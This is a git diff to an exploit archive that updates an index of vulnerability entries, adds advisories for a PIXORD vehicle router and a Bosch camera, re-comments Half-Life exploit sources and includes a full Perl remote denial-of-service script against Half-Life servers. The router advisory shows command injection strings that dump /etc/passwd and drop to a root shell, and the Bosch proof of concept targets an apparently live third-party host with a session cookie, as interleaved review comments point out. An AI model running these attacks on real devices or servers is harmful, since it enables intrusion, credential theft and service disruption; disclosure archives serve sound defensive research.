 28640,platforms/windows/remote/28640.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Web Server Path Disclosure",2006-09-21,"Patrick Webster",windows,remote,0
 28641,platforms/windows/remote/28641.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Unspecified Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote,0
 28642,platforms/windows/remote/28642.txt,"CA eSCC r8/1.0_eTrust Audit r8/1.5 Audit Event System Unspecified Replay Attack",2006-09-21,"Patrick Webster",windows,remote,0
@@ -27154,7 +27154,7 @@ id,file,description,date,author,platform,type,port
 30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0
-30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
+30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
 30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0
 30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0
 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0
@@ -27594,7 +27594,7 @@ id,file,description,date,author,platform,type,port
 30645,platforms/windows/remote/30645.txt,"Microsoft Windows URI Handler Command Execution Vulnerability",2007-10-05,"Billy Rios",windows,remote,0
 30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability",2007-07-16,"Nobuhiro Ban",linux,dos,0
 30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.PHP Cross-Site Scripting Vulnerability",2007-10-08,medconsultation.ru,php,webapps,0
-30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
+30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
 30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0
 30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection Vulnerability",2007-10-09,"Radu State",hardware,remote,0
 30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Include Vulnerability",2007-10-10,Cyber-Crime,php,webapps,0
@@ -28043,7 +28043,7 @@ id,file,description,date,author,platform,type,port
 31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow Vulnerability",2008-02-12,forensec,linux,local,0
 31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
 31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
-31154,platforms/php/webapps/31154.txt,"Counter Strike Portals 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
+31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
 31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
 31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0
@@ -28509,7 +28509,7 @@ id,file,description,date,author,platform,type,port
 31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
 31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
 31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0
-31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 - Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
+31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
 31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0
 31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,metasploit,windows,local,0
 31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
@@ -30689,7 +30689,7 @@ id,file,description,date,author,platform,type,port
 34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
 34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
 34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
-34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
+34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
 34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
 34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
 34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 - Cross-Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
@@ -31416,7 +31416,7 @@ id,file,description,date,author,platform,type,port
 34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80
 34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
 34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
-34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plug-in Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
+34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
 34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross-Site Scripting Vulnerability",2009-07-15,Moudi,php,webapps,0
 34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service Vulnerability",2010-10-19,Sweet,windows,dos,0
 34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal Vulnerability",2009-08-27,Inj3ct0r,php,webapps,0
@@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port
 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0
 36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
-36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
+36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0
 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0
 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80
@@ -32964,7 +32964,7 @@ id,file,description,date,author,platform,type,port
 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0
 36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0
 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0
-36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plug-in 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
+36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0
 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0
 36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0
@@ -34003,7 +34003,7 @@ id,file,description,date,author,platform,type,port
 37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
 37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
 37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
-37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
+37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
 37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
 37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
 37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0
@@ -34656,3 +34656,12 @@ id,file,description,date,author,platform,type,port
 38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0
 38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross Site Scripting Vulnerability",2013-03-08,"Rafay Baloch",php,webapps,0
 38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability",2013-03-08,"Asheesh Anaconda",multiple,remote,0
+38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0
+38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
+38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
+38372,platforms/php/webapps/38372.html,"Question2Answer Cross Site Request Forgery Vulnerability",2013-03-01,MustLive,php,webapps,0
+38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection Vulnerability",2013-03-08,"Aditya Balapure",php,webapps,0
+38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0
+38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0
+38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0
+38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0
diff --git a/platforms/hardware/remote/38370.txt b/platforms/hardware/remote/38370.txt
new file mode 100755
index 000000000..c824c25db
--- /dev/null
+++ b/platforms/hardware/remote/38370.txt
@@ -0,0 +1,231 @@ +# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple +Vulnerabilities] +# Date: May 01, 2015 [No response from Vendor till date] +# Discovered by: Karn Ganeshen +# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17] +# Version: [Model Name :3GR-431P] +[Software Version :RTA-A001_02] +[Wireless Driver Version :2.6.0.0] + +*Vehicle 3G Wi-Fi Router - PIXORD * +http://www.pixord.com/en/products_show.php?show=17 + +*Device Info * + +Model Name :3GR-431P +Software Version :RTA-A001_02 +Wireless Driver Version :2.6.0.0 + +PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless +router. It supports Internet access via 3G and receives position +information from GPS. 3GR-431P also supports two Ethernet ports for LAN +connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity. + +It is available to install the 3GR-431P on the transportation. The +passengers can use the laptop or smart phone via Wi-Fi to browse the +Internet on the go. The Ethernet port also can connect IP camera to provide +the real time monitoring. + +Vulnerability Impact: Easy and full device compromise. Access to configured +keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user / +vehicle via camera / connected devices. + +*Multiple Security Vulnerabilities * + +*1. OS command injection * +$ telnet 192.168.1.10 +Trying 192.168.1.10... +Connected to 192.168.1.10. +Escape character is '^]'. +Vehicle 3G Wi-Fi Router +Login: admin +Password: +> +> ? +mobile3G +mobileGPS +model +reboot +restoredefault +version + +As seen above, only few specific, functional options are available for +device management. + +However, we can bypass this and dump hashes easily. + +> ?;cat /etc/passwd +sh: ?: not found + +admin::0:0:Adminstrator:/:/bin/sh +support::0:0:Adminstrator:/:/bin/sh +user::0:0:Adminstrator:/:/bin/sh + +> exit + +Note that this is also applicable when a non-admin ‘user’ / ‘support’ logs +in over the Telnet. 
+ +The web application lacks strict input validation and hence vulnerable to +OS command injection attack. + +*2. Configuration not secured properly / AuthZ issues * + +The device has three users - admin, support, user. + +Apparently, there is no separation of privileges between these 3 users, +when accessing over HTTP(S). All options are available to all three then. +This allows 'user' /'support' to access device configuration file - +RT2880_Settings.dat. Configuration backup contains b64-encoded login +passwords + clear-text WPA keys + other sensitive information. + +.. … +*Sensitive information in configuration file - * + +*more RT2880_Settings.dat * +#The following line must not be removed. +Default +WebInit=1 +HostName=pixord +Login=admin +Password== +Login2=support +Password2=== +Login3=user +Password3=== +OperationMode=1 +Platform=RT3352 +..... + +..... +wan_pppoe_user=pppoe_user +wan_pppoe_pass=pppoe_passwd +wan_l2tp_server=l2tp_server +wan_l2tp_user=l2tp_user +wan_l2tp_pass=l2tp_passwd +..... + +..... +wan_pptp_server=pptp_server +wan_pptp_user=pptp_user +wan_pptp_pass=pptp_passwd +..... + +..... +DDNS= +DDNSAccount= +DDNSPassword= +CountryRegion= +CountryRegionABand= +CountryCode= +BssidNum=1 +SSID1=PiXORD +WirelessMode=9 +..... + +..... +WscSSID=RalinkInitialAP +WscKeyMGMT=WPA-EAP +WscConfigMethod=138 +WscAuthType=1 +WscEncrypType=1 +WscNewKey= +IEEE8021X=0 +IEEE80211H=0 +CSPeriod=6 +PreAuth=0 +AuthMode=WPAPSKWPA2PSK +EncrypType=TKIPAES +RekeyInterval=3600 +RekeyMethod=TIME +PMKCachePeriod=10 +WPAPSK1= +DefaultKeyID=2 +Key1Type=0 +Key1Str1= +Key2Type=0 +Key2Str1= +Key3Type=0 +Key3Str1= +Key4Type=0 +Key4Str1= +WapiPskType=0 +..... + +..... +WdsEnable=0 +WdsEncrypType=NONE +WdsList= +WdsKey= +WirelessEvent=0 +RADIUS_Server=0 +RADIUS_Port=1812 +RADIUS_Key= +RADIUS_Acct_Server= +RADIUS_Acct_Port=1813 +RADIUS_Acct_Key= +..... + +..... +wan_3g_apn=public +wan_3g_dial=*99# +wan_3g_user= +wan_3g_pass= + +RADIUS_Key1= +..... + +..... 
+ +Also, as observed in point 1 above, all the users have a UID 0, i.e. root +level privileges to the device: + +admin::0:0:Adminstrator:/:/bin/sh +support::0:0:Adminstrator:/:/bin/sh +user::0:0:Adminstrator:/:/bin/sh + +The application should ideally provide specific privileges to different +users, and enforce strict access control. + +*3. Application does not secure configured passwords (HTTPS) * + +Masked password(s) can be retrieved via frame source (inspect element) and +/ or intercepting request via a proxy. + +The application should mask/censure (*****) the passwords, keys and any +other crucial pieces of configuration and must not pass the values in +clear-text. + +*4. Program / Scripts running in an insecure manner - leaking clear-text +passwords in process information * + +After logging in to the device over Telnet, we can drop in to a shell via +OS command injection attack described in point 1. + +> ?;sh +sh: ?: not found +Enter 'help' for a list of built-in commands. +BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash) + +# + +Checking running processes reveal a system program *inadyn*, which +apparently is a service for ddns connectivity, leaking valid username and +password in clear-text. + +# ps aux +PID USER VSZ STAT COMMAND +1 admin 1768 S init +2 admin 0 RWN [ksoftirqd/0] +..... + +..... +2159 admin 1096 S inadyn -u ** -p ** + -a ** +4050 admin 1768 R ps aux + +The programs should be run securely without passing cli arguments and +parameter values in clear-text. +-- +Best Regards, +Karn Ganeshen diff --git a/platforms/hardware/webapps/38369.txt b/platforms/hardware/webapps/38369.txt new file mode 100755 index 000000000..571ebaeda --- /dev/null +++ b/platforms/hardware/webapps/38369.txt 
@@ -0,0 +1,100 @@ +# Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface + +# Date: 01/09/2015 + +# Exploit Author: neom22 + +# Vendor Homepage: http://us.boschsecurity.com + +# Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf + +# Version: Hardware Firmware 4.54.0026 - Web Interface version is unknown + +# Tested on: Windows 8.1 - Firefox 40.0.3 + +# CVE : CVE-2015-6970 (To be published) + + +################################################# +# # +# Discovered by neom22 # +# 23 - 09 - 2015 # +# # +################################################# +# +# +Bosch Security Systems - Dinion NBN-498 - Web Interface (Live Feed and Administration) +# +# +Vulnerability Discovery: 10/09/2015 +Vendor Contact: 17/09/2015 (no answer) +Published: 24/09/2015 +# +# + +Description: +----------------------------------------------------------------- +The Dinion2x IP Day/Night camera is a high-performance, smart +surveillance color camera. It incorporates 20-bit digital signal +processing and a wide dynamic range sensor for outstanding +picture performance under all lighting conditons. +The camera uses H.264 compression technology to give clear +images while reducing bandwidth and storage requirements. It +is also ONVIF compliant to improve compatibility during system +integration. +The camera operates as a network video server and transmits +video and control signals over data networks, such as Ethernet +LANs and the Internet. 
+----------------------------------------------------------------- + +Useful Links: + +Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf +Documentation: http://resource.boschsecurity.us/documents/Installation_Manual_enUS_2032074379.pdf +Product: + +http://us.boschsecurity.com/en/us_product/products/video/ipcameras/sdfixedcameras/nbn498dinion2xdaynightipc/nbn498 + +dinion2xdaynightipc_608 +----------------------------------------------------------------- + +XML Parameter Injection POC + +_-Request-_ + +GET /rcp.xml?idstring=injection HTTP/1.1 +Host: postoipiranga.dyndns-ip.com:10004 +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: HcsoB=60cd4a687de94857 +Connection: keep-alive + +_-Response-_ + +HTTP/1.1 200 OK +Server: VCS-VideoJet-Webserver +Connection: keep-alive +Content-Type: text/xml +Accept-Ranges: bytes +Content-Length: 359 +Expires: 0 +Cache-Control: no-cache +Set-Cookie: HcsoB=60cd4a687de94857; path=/; + + + + 0x0000 + 0 + + T_DWORD + READ + 0 + injection + +0x478e0x000000001TCP + 0x40 + + + \ No newline at end of file diff --git a/platforms/linux/remote/22141.c b/platforms/linux/remote/22141.c index d70328935..5d262aa47 100755 --- a/platforms/linux/remote/22141.c +++ b/platforms/linux/remote/22141.c 
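Review bot: The PoC request carries what looks like a live third-party endpoint and session rather than placeholders: `Host: postoipiranga.dyndns-ip.com:10004`, `Cookie: HcsoB=60cd4a687de94857` and the matching `Set-Cookie` in the response. The other advisories added in this commit use `www.example.com`; the same should be done here, e.g. `Host: www.example.com`, with the cookie values blanked before the file is published. The header dates also disagree with each other (`# Date: 01/09/2015` precedes `Vulnerability Discovery: 10/09/2015`), so one of them is probably wrong. The response body appears to have lost its XML markup in this rendering, so the injected element cannot be checked from this page.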
@@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/6580/info +//source: http://www.securityfocus.com/bid/6580/info -A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. +//A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory. -Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. +// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server. /***************************************************************** * hoagie_adminmod.c diff --git a/platforms/linux/remote/22968.c b/platforms/linux/remote/22968.c index 060a6402f..f4ebe7155 100755 --- a/platforms/linux/remote/22968.c +++ b/platforms/linux/remote/22968.c 
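Review bot: The new comment markers are spaced inconsistently within this hunk: `//source:` and `//A format string` have no space after `//` while `// Successful exploitation` does, and the same mix recurs in 22968.c (`//source:`, `//Half-Life`, `//This`) and 22139.c (`//source:` beside `// A format string`), whereas 22969.c, 22138.c and 22140.c consistently use `// `. Pick one form throughout, e.g. `// source: http://www.securityfocus.com/bid/6580/info`. Since the file's own header just below already opens a `/* ... */` block, folding the three advisory sentences into that block comment would also avoid three very long single-line comments.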
@@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/8300/info +//source: http://www.securityfocus.com/bid/8300/info -Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. +//Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-//check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. -This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. +//This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. // // PRIV8 SECURITY & UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE !!! diff --git a/platforms/linux/remote/22969.c b/platforms/linux/remote/22969.c index aa0d58e29..fcc6e135a 100755 --- a/platforms/linux/remote/22969.c +++ b/platforms/linux/remote/22969.c 
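Review bot: The second added line has a stray comment marker inserted mid-word, `bounds-//check`, which garbles the sentence; it should read `... fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games ...`. The extra `//` is harmless to the compiler because the text is already inside a `//` comment, but it reads as if a line wrap was lost when the prefix was added, so the line is worth re-checking against the original advisory text on the removed line.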
@@ -1,8 +1,8 @@ -source: http://www.securityfocus.com/bid/8300/info +// source: http://www.securityfocus.com/bid/8300/info -Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. +// Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server. -This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. +// This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems. /***************************************************************** * hoagie_hlserver.c diff --git a/platforms/multiple/dos/1483.pl b/platforms/multiple/dos/1483.pl index 746231e1f..328679bdf 100755 --- a/platforms/multiple/dos/1483.pl +++ b/platforms/multiple/dos/1483.pl 
@@ -1,40 +1,40 @@ -#!/usr/bin/perl -# Server must not be running steam. /str0ke - - -# Half-Life engine remote DoS exploit -# bug found by Firestorm -# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server -use IO::Socket; -die "usage: ./csdos " unless $ARGV[0]; -$host=$ARGV[0]; - -if (fork()) -{ econnect($host); } -else -{ econnect($host); }; -exit; - -sub econnect($) -{ - my $host=$_[0]; - my $sock = new -IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); - die "Could not create socket: $!\n" unless $sock; - $cmd="\xff\xff\xff\xff"; - syswrite $sock, $cmd."getchallenge"; - - sysread $sock,$b,65535; print $b,"\n"; - @c=split(/ /,$b); - - $c2=$c[1]; - - $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0"; -print '>',$q,"\n"; -syswrite $sock, $q; -sysread $sock,$b,65535; print $b,"\n"; -sleep 3; -close $sock; -} - -# milw0rm.com [2006-02-11] +#!/usr/bin/perl +# Server must not be running steam. /str0ke + + +# Half-Life engine remote DoS exploit +# bug found by Firestorm +# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server +use IO::Socket; +die "usage: ./csdos " unless $ARGV[0]; +$host=$ARGV[0]; + +if (fork()) +{ econnect($host); } +else +{ econnect($host); }; +exit; + +sub econnect($) +{ + my $host=$_[0]; + my $sock = new +IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp'); + die "Could not create socket: $!\n" unless $sock; + $cmd="\xff\xff\xff\xff"; + syswrite $sock, $cmd."getchallenge"; + + sysread $sock,$b,65535; print $b,"\n"; + @c=split(/ /,$b); + + $c2=$c[1]; + + $q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0"; +print '>',$q,"\n"; +syswrite $sock, $q; +sysread $sock,$b,65535; print $b,"\n"; +sleep 3; +close $sock; +} + +# milw0rm.com [2006-02-11] 
